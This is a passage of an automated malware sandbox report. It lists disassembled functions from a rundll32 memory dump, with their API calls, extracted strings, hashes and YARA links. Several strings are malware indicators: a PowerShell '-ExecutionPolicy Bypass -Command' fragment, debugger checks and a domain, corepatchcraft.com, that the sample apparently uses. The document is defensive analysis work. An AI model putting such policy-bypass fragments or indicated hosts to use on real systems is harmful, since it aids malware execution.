                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception
                          • String ID: FstL$L$wAcH$xeCcjS$yiiUXY
                          • API String ID: 2807920213-2290398226
                          • Opcode ID: d66b0cca88219e533916a86e474d858daf07251c51964487cf235522b9ad2487
                          • Instruction ID: 530a47fb8c0e81077789f91395e71ba7c7f8a7a65bc35c98bd93f291aa216507
                          • Opcode Fuzzy Hash: d66b0cca88219e533916a86e474d858daf07251c51964487cf235522b9ad2487
                          • Instruction Fuzzy Hash: 6CF223B4D05268DBDB65CB68CCA4BDEBBB4AF49300F1085DAD509A7281DB706F88CF51
                          Function 7EF678BF Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 7EF679CB
                          • IsValidCodePage.KERNEL32(00000000), ref: 7EF67A14
                          • IsValidLocale.KERNEL32(?,00000001), ref: 7EF67A23
                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 7EF67A6B
                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 7EF67A8A
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                          • String ID:
                          • API String ID: 415426439-0
                          • Opcode ID: e2d1d28c660cb6b48a00190c377060cf7259471ec7d70e67b0aa6f8ac8fc791c
                          • Instruction ID: 3d7d5b86968ad9fa8aeaec9e14a37358f6f3beef35604bbcdab03eb1a8a4fdde
                          • Opcode Fuzzy Hash: e2d1d28c660cb6b48a00190c377060cf7259471ec7d70e67b0aa6f8ac8fc791c
                          • Instruction Fuzzy Hash: 9A517C7AA04605EBEB00DFA5CC60BAE77F8BF44300F10056AE916E79D0F7709A048B61
                          Function 7EF66F5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • GetACP.KERNEL32(?,?,?,?,?,?,7EF5F5A2,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 7EF6701C
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7EF5F5A2,?,?,?,00000055,?,-00000050,?,?), ref: 7EF67047
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7EF671AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CodeInfoLocalePageValid
                          • String ID: utf8
                          • API String ID: 607553120-905460609
                          • Opcode ID: e3a5891c57d32ca58bd7ac0917cdbc58491a178f1ba6f4d23419be94f8779fd9
                          • Instruction ID: fcd6c7ab21b0f785f2040d2e7380cedcd95e9fbc6cdf723a3b7c69fa0b3f6808
                          • Opcode Fuzzy Hash: e3a5891c57d32ca58bd7ac0917cdbc58491a178f1ba6f4d23419be94f8779fd9
                          • Instruction Fuzzy Hash: 9F71E37A604602EBEB15AB75CD71BAA73F9EF44300F11486BE906DB9C4FB74E9408760
                          Function 7EF46D80 Relevance: 7.1, Strings: 5, Instructions: 875COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: |J$" -ExecutionPolicy Bypass -Command "$D$e$e
                          • API String ID: 0-766941145
                          • Opcode ID: 33a1b226f57f84bd7fc441e6aff390c68bd0422b340e4fe27e454c48f18ef9ec
                          • Instruction ID: 25d012a20206da3ecc4dbb8cf1136e309a0a75ed99ef78dc1c494a0c0e455b05
                          • Opcode Fuzzy Hash: 33a1b226f57f84bd7fc441e6aff390c68bd0422b340e4fe27e454c48f18ef9ec
                          • Instruction Fuzzy Hash: EBB2AB78E05269CFCB65CF58C8A4BDDBBB1BB49304F1081DAD849A7345DB30AA85CF50
                          Function 7EF3CE30 Relevance: 6.9, Strings: 5, Instructions: 635COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #$$$8$n${
                          • API String ID: 0-1307703517
                          • Opcode ID: da8d047201781a5b543397a35abfe92d0a1b1840fa90d0b98c90e7906888f13a
                          • Instruction ID: 8f9f8c0fedff8433fca0cb959c3c5f0c02458fc22d45d2d79c3e9cfd347d8894
                          • Opcode Fuzzy Hash: da8d047201781a5b543397a35abfe92d0a1b1840fa90d0b98c90e7906888f13a
                          • Instruction Fuzzy Hash: D2621334A14259CADB24CFA4C850BDEB7B2FF98304F1080AAD50DAB790E7765E85CF59
                          Function 7EF37320 Relevance: 6.8, Strings: 5, Instructions: 533COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '$N/A$R$S$l
                          • API String ID: 0-2084888942
                          • Opcode ID: 24dbb590796aa8c5906d71573358eb2f4d4301b4fcc63abb61b4ea662a48105a
                          • Instruction ID: a686f57ba2e233b5520e7443c2050f0ef9d49fd7a9232a0d100767ecf55095ce
                          • Opcode Fuzzy Hash: 24dbb590796aa8c5906d71573358eb2f4d4301b4fcc63abb61b4ea662a48105a
                          • Instruction Fuzzy Hash: 0F420374E04258CBDB15CFA8C890BEEB7B2FF89304F1081AAD509AB394E7715A85CF55
                          Function 7EF61B6C Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strrchr
                          • String ID:
                          • API String ID: 3213747228-0
                          • Opcode ID: 44ed88f6ba2c6c923b7e4f7c1f4b16af1dbdd87646cd4620f9ac410d0ade0b1b
                          • Instruction ID: a0f357d7f8a51eb42a21ce99a5b90afba21cde9a622fd6c1ecba755fafded5bc
                          • Opcode Fuzzy Hash: 44ed88f6ba2c6c923b7e4f7c1f4b16af1dbdd87646cd4620f9ac410d0ade0b1b
                          • Instruction Fuzzy Hash: 81B1693A904A55DFDB02CF28C8A07EEBFF5EF55300F1485AAD849AB741D235D901CBA0
                          Function 7EF4E077 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7EF4E083
                          • IsDebuggerPresent.KERNEL32 ref: 7EF4E14F
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7EF4E168
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 7EF4E172
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 7e7d3e36be3c2b8037b9ede3a5468a210c496cca1f4a252596d5ba71b1d0acc3
                          • Instruction ID: af82f2917ba3a85e193d3f9a2d3c435d14b07123a645464b382585e542588a97
                          • Opcode Fuzzy Hash: 7e7d3e36be3c2b8037b9ede3a5468a210c496cca1f4a252596d5ba71b1d0acc3
                          • Instruction Fuzzy Hash: 203114B9C05218DBDB21DFA4C949BCDBBB8BF48300F1051AAE40DAB250EB719A858F45
                          Function 7EF2C2E0 Relevance: 5.5, Strings: 3, Instructions: 1787COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <$@$`
                          • API String ID: 0-4173208228
                          • Opcode ID: 6b3029e8b11fc1de2007406260905469c895de31b84ebe4370c4f85a72bd8c5e
                          • Instruction ID: a5e2c79df06d87a8b7d383974a25dd4aff921f1dba1f1e55368388843d9909aa
                          • Opcode Fuzzy Hash: 6b3029e8b11fc1de2007406260905469c895de31b84ebe4370c4f85a72bd8c5e
                          • Instruction Fuzzy Hash: FA338EB8E05269CFCB65CF18C8A0B9DBBB5BF49305F1081EAD849A7355D731AA81CF44
                          Function 7EF3B7C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv
                          • String ID: @
                          • API String ID: 3732870572-2766056989
                          • Opcode ID: 210728af567bf92a0c9bbf925bba1c55754a4f3711d2c28dd602a208fbe1ce3c
                          • Instruction ID: 8d1ec110ca42d511efb6494916b21e15c77a0526c28b2373d043f38791f10042
                          • Opcode Fuzzy Hash: 210728af567bf92a0c9bbf925bba1c55754a4f3711d2c28dd602a208fbe1ce3c
                          • Instruction Fuzzy Hash: 5A7192B8E05259DFCB04CF99C4A0AAEFBB1BF48304F20819AD915BB745D734AA46CF54
                          Function 7EF6736E Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EF673C2
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EF6740C
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EF674D2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale$ErrorLast
                          • String ID:
                          • API String ID: 661929714-0
                          • Opcode ID: 062d20b44b94820984af7af9eee8b47f975e4ca360b29ae15f729e36b7e0f4f1
                          • Instruction ID: 5df2eb0834cb4059ffa93275f592bdc0bbc09c276ebc72efd6d77bec81c41620
                          • Opcode Fuzzy Hash: 062d20b44b94820984af7af9eee8b47f975e4ca360b29ae15f729e36b7e0f4f1
                          • Instruction Fuzzy Hash: BF619D79510207DFEB159F28CDA5BAAB7F9FF04314F1081AAE90AC69C9E734D980CB50
                          Function 7EF51F06 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 7EF51FFE
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 7EF52008
                          • UnhandledExceptionFilter.KERNEL32(7EF71D18,?,?,?,?,?,00000000), ref: 7EF52015
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 8a9d0ff4cd378b01dc0b50fb006e0260da3c79953e99bedbfbaac9ef19c216b0
                          • Instruction ID: 2f4265cc3fe38c63041c13c05fdee6ef7ac2f8f0a22660b23a0b3c9ee699d4e8
                          • Opcode Fuzzy Hash: 8a9d0ff4cd378b01dc0b50fb006e0260da3c79953e99bedbfbaac9ef19c216b0
                          • Instruction Fuzzy Hash: 4531D475941218EBCB21DF24D99878DBBF8BF58310F5056EAE40DA7250E7309F858F45
                          Function 7EF18B90 Relevance: 4.3, Strings: 3, Instructions: 553COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @$@$PE
                          • API String ID: 0-2458287169
                          • Opcode ID: b0fae50eb8b40f2dd01b565e70bf9b8872d8e92ad1e975d71313182a0f42fb7f
                          • Instruction ID: e9b89e5211888bc9f99bd5b0989fe71ca09b89c9ded969a81c6eef24904886e6
                          • Opcode Fuzzy Hash: b0fae50eb8b40f2dd01b565e70bf9b8872d8e92ad1e975d71313182a0f42fb7f
                          • Instruction Fuzzy Hash: E752A378E05269CFDB54CF99C990BDDBBB2BF49304F10819AD809AB345D731AA85CF90
                          Function 7EF2E560 Relevance: 4.2, Strings: 2, Instructions: 1746COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: |J$D
                          • API String ID: 0-12622807
                          • Opcode ID: 00fd34555402d578631caa540249d33b662e9325b887e4f837ad374d341123cb
                          • Instruction ID: 367cfd0f5fe1d5ae04d023e276ec262e7999b6aba70f96bf69f1d1346bff742c
                          • Opcode Fuzzy Hash: 00fd34555402d578631caa540249d33b662e9325b887e4f837ad374d341123cb
                          • Instruction Fuzzy Hash: 54239EB8E05269CFCB65CF18C8A0B9DBBB5BF49305F1081EAD849A7355D730AA81CF44
                          Function 7EF306D0 Relevance: 3.9, Strings: 2, Instructions: 1432COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: |J$D
                          • API String ID: 0-12622807
                          • Opcode ID: d51252dcfbab0301d18250f38c2059455ce3df68919451b1e416775383bc8ed1
                          • Instruction ID: 42abe49693e203d8419422519bd32a9626107508cd80e9dbb4bc152373fdf5ed
                          • Opcode Fuzzy Hash: d51252dcfbab0301d18250f38c2059455ce3df68919451b1e416775383bc8ed1
                          • Instruction Fuzzy Hash: E0039CB8E05269CFCB65CF18C8A0BDDBBB1BB89304F1081DAD949A7355D730AA81CF54
                          Function 7EF27630 Relevance: 3.9, Strings: 2, Instructions: 1362COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: e$e
                          • API String ID: 0-2104337576
                          • Opcode ID: f127913b26b10dc88e16e5e5f60fbd78c0b9d407321c9bcdd02479fe560f9bec
                          • Instruction ID: 1d084f5732eed6ce9dece615bf388a451917330b789cf4e8654cd783750f1bf8
                          • Opcode Fuzzy Hash: f127913b26b10dc88e16e5e5f60fbd78c0b9d407321c9bcdd02479fe560f9bec
                          • Instruction Fuzzy Hash: B3038DB8E05269CFCB65CF58C8A0BDDBBB5BB49304F1081EAD849A7345D730AA85CF54
                          Function 7EF29020 Relevance: 3.9, Strings: 2, Instructions: 1361COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memcpy_s
                          • String ID: |J$D
                          • API String ID: 2001391462-12622807
                          • Opcode ID: 7b1e2368b7cd20e1f2ae8a5f2b08b011466dce600d0631c10e61b8ac4c239cd4
                          • Instruction ID: 64370c6806999e0ac822098c011f6e390f73ff48b2a8d56b7b88f716c229d53f
                          • Opcode Fuzzy Hash: 7b1e2368b7cd20e1f2ae8a5f2b08b011466dce600d0631c10e61b8ac4c239cd4
                          • Instruction Fuzzy Hash: 1503AEB8E05269CBCB65CF58C8A0BDDBBB5BF49304F1081EAD849A7355D730AA81CF54
                          Function 7EF55100 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6eb18c89ea4973aa31a540b8b8c8a1494ab8aaf544fe8af1c057000186f9d59c
                          • Instruction ID: 3cbdfc4b1ccf662a4d3e9b4a2b826739865362fcdf09e3b2ebdb1ea4cd40554b
                          • Opcode Fuzzy Hash: 6eb18c89ea4973aa31a540b8b8c8a1494ab8aaf544fe8af1c057000186f9d59c
                          • Instruction Fuzzy Hash: F1F15175E00219DFDF14CFA9C8A06ADBBF2FF58314F158269E819AB794D730A945CB80
                          Function 7EF35F00 Relevance: 3.3, Strings: 2, Instructions: 821COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: YkJW$corepatchcraft.com
                          • API String ID: 0-3402831901
                          • Opcode ID: 40e3759387758e58170245f14be95476243c93d7adc88efd3b612343bc62d099
                          • Instruction ID: 9ca0e763a76b6e9950112916c97311b97bb6c8cdf931bca6279cd59459a1f1f2
                          • Opcode Fuzzy Hash: 40e3759387758e58170245f14be95476243c93d7adc88efd3b612343bc62d099
                          • Instruction Fuzzy Hash: 16821474D05258DBDB15DBA8CCA0BDEBBB5AF49304F1085EAD40AA7641EB305F88CF91
                          Function 7EF5B7F4 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,7EF36F6B,00000000,?,?,7EF313DB,?,0000000B), ref: 7EF5B809
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 7EF5B828
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 1518329722-0
                          • Opcode ID: e322068c7c64e33c835f80560ff40912f6bf530304ade3b646545393d558e09f
                          • Instruction ID: 1445de61bf67c2c6cea9dc0d07d1549cddcd746e68e304ceef3a822ede5f1e1f
                          • Opcode Fuzzy Hash: e322068c7c64e33c835f80560ff40912f6bf530304ade3b646545393d558e09f
                          • Instruction Fuzzy Hash: 2DF0F4BAA00214BBCB14DF29885099EBFE9EEC52717254259E81AD3744D670CE02C390
                          Function 7EF2A980 Relevance: 2.6, Strings: 1, Instructions: 1355COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: |J
                          • API String ID: 0-1146653492
                          • Opcode ID: 109958d1ad1e913175189a1ec08b56555d4d8714b10f27c445e35a64f296fbeb
                          • Instruction ID: 2a3435e7360e68ad06eadbd54ce7c674ffa5847c04f22af589be8c2766b89822
                          • Opcode Fuzzy Hash: 109958d1ad1e913175189a1ec08b56555d4d8714b10f27c445e35a64f296fbeb
                          • Instruction Fuzzy Hash: 45038EB8E05269CBCB65CF58C8A0BDDBBB5BF49304F1081EAD849A7355D730AA81CF54
                          Function 7EF3A9E0 Relevance: 2.0, Strings: 1, Instructions: 765COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 3b1ba92bec468b02671ac6eb42ee4934f795a35ff6662cfab4c8812e5475e77a
                          • Instruction ID: c1083c71f6b10e34862d650836f7f06234095a89f72d50aacbe261d81d4a1668
                          • Opcode Fuzzy Hash: 3b1ba92bec468b02671ac6eb42ee4934f795a35ff6662cfab4c8812e5475e77a
                          • Instruction Fuzzy Hash: C1A27A78E05269CFDB64CF59C8A4BDDBBB1BB89304F2081DAD849A7355D730AA81CF50
                          Function 7EF5E27D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,7EF5E278,?,?,00000008,?,?,7EF6D7B5,00000000), ref: 7EF5E4AA
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: b176a693bcda95a5b40fa13db4ac8912ba7de77b6daec5ec0021687ead9acec7
                          • Instruction ID: 5ad6f292b25ef90f3008c9d9e6b803d1740e3e1fe446ff1ddb22fef23208a692
                          • Opcode Fuzzy Hash: b176a693bcda95a5b40fa13db4ac8912ba7de77b6daec5ec0021687ead9acec7
                          • Instruction Fuzzy Hash: 8FB1263A610608CFD705CF28C4A6B697BF1FB15364F258658E89ACF7A1C335E982CB40
                          Function 7EF37B60 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aullrem
                          • String ID: N/A
                          • API String ID: 3758378126-2525114547
                          • Opcode ID: 107359989b3af77a4313803a47abfda93309f34731df664abf86f39463340f56
                          • Instruction ID: 2538eba1ff2ea5a1c9d0880ec9b0712e38b8cb0f911565079543cc4c9288c0da
                          • Opcode Fuzzy Hash: 107359989b3af77a4313803a47abfda93309f34731df664abf86f39463340f56
                          • Instruction Fuzzy Hash: 81527E78E05268CFDB65CF99C9A0BDDBBB1BF49304F20819AD849A7345D734AA81CF50
                          Function 7EF1CB70 Relevance: 1.7, Strings: 1, Instructions: 413COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 99ed8fcf0a673adba2fdccc2f3acfb5d881679c92dcb768de1d9970dbf8052f7
                          • Instruction ID: 7c088b74614079438b14fde1270747b4f994101f7110478e65c647195ad0f2bf
                          • Opcode Fuzzy Hash: 99ed8fcf0a673adba2fdccc2f3acfb5d881679c92dcb768de1d9970dbf8052f7
                          • Instruction Fuzzy Hash: 4022BE78E05269CFCB28CF98C9A0BDDBBB1BF49304F10819AD859A7755D730AA85CF50
                          Function 7EF4DE2C Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 7EF4DE42
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-0
                          • Opcode ID: e8100bddef2bb6d4d2243ec1ca4c2bf6e2046c04bb9bc7dbad102165760a9783
                          • Instruction ID: 64df36535ec4894959eb516794e516ddac9f1e8139d2c9b639079209d60ce604
                          • Opcode Fuzzy Hash: e8100bddef2bb6d4d2243ec1ca4c2bf6e2046c04bb9bc7dbad102165760a9783
                          • Instruction Fuzzy Hash: D3517CB6A10205CBDB15CF56D8A17AEBBF4FB49318F20916BD402EBA40D375EA40CB90
                          Function 7EF64932 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aff5c0853b1c88def996c22f7af591a779af643bdc839f4b58def95f192857fb
                          • Instruction ID: a3f2200825e2b5428993ea8079582d379784d37c9f32cfecce3a282a7eb6a56d
                          • Opcode Fuzzy Hash: aff5c0853b1c88def996c22f7af591a779af643bdc839f4b58def95f192857fb
                          • Instruction Fuzzy Hash: CA41A57980421DAFDB21EF69CC98AAABBB9FF45204F1442D9E41DD3604EA319E448F50
                          Function 7EF5A58B Relevance: 1.6, Strings: 1, Instructions: 388COMMONLIBRARYCODE
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          • Opcode ID: 3eaab66cca58590935bc93f2c2e139afb5bda50a90a44fe34cd0328f079e82b9
                          • Instruction ID: 7913820c5ad3fbc18c3861e76d5a3f7bb654c9d912e4aa56b82bc86e5edd3a90
                          • Opcode Fuzzy Hash: 3eaab66cca58590935bc93f2c2e139afb5bda50a90a44fe34cd0328f079e82b9
